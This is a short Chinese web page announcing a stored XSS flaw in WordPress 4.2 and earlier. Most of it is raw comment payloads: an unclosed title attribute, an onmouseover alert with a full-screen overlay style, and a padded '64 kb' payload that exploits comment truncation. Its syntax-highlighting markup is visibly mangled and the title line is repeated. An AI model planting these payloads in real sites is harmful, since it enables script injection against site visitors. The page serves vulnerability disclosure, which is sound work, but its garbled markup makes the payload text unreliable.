WordPress曝存储型XSS漏洞,影响4.2及以下版本,
WordPress曝存储型XSS漏洞,影响4.2及以下版本,
<span class="pln"><abbr title='We</span>
这会导致wordpress的页面布局混乱,如果再插入一条这样的留言:
<span class="pln">cedric' onmouseover='alert(1)'
style='position:fixed;top:0;left:0;width:100%;height:100%'</span>
页面将显示为这样:
<spanclass="pln">sometext
<blockquote cite='x onmouseover=alert(1)</span>
<spanclass="tag"><a</span><spanclass="pln"> </span><spanclass="atn">title</span><spanclass="pun">=</span><spanclass="atv">'x onmouseover=alert(unescape(/hello%20world/.source))
style=position:absolute;left:0;top:0;width:5000px;height:5000px
AAAAAAAAAAAA [64 kb] ...'</span><spanclass="tag">></a></span>
受影响的版本
WordPress 4.2及以下版本均受影响。
评论暂时关闭